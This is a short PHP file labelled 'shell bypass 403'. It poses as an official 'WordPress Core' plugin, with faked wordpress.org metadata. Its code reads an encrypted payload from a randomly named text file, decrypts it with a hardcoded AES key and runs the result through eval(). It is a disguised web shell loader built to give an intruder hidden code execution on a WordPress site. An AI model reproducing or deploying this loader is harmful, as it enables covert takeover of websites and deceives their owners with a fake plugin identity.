shell bypass 403
<?php
/**
* @package Wordpress_Core
* @version 1.7.3
*/
/*
Plugin Name: WordPress Core
Plugin URI: https://wordpress.org/plugins/
Description: This is core plugin for managment WordPress.
Version: 1.7.3
Author URI: https://wordpress.org/
*/
class UnsafeCrypto
{
const METHOD = 'aes-256-ctr';
public static function decrypt($message, $nonce, $key, $encoded = false)
{
if ($encoded) {
$message = base64_decode($message, true);
$nonce = base64_decode($nonce, true);
if ($message === false || $nonce === false) {
throw new Exception('Encryption failure');
}
}
$plaintext = openssl_decrypt(
$message,
self::METHOD,
$key,
OPENSSL_RAW_DATA,
$nonce
);
return $plaintext;
}
}
$key = hex2bin('038932ecd6632089184440d5967f965721b4112af29695a8138f705773060cc8');
$parts = file('./ugfyxfqzfh.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$decrypted = UnsafeCrypto::decrypt($parts[1], $parts[0], $key, true);
eval($decrypted);
?>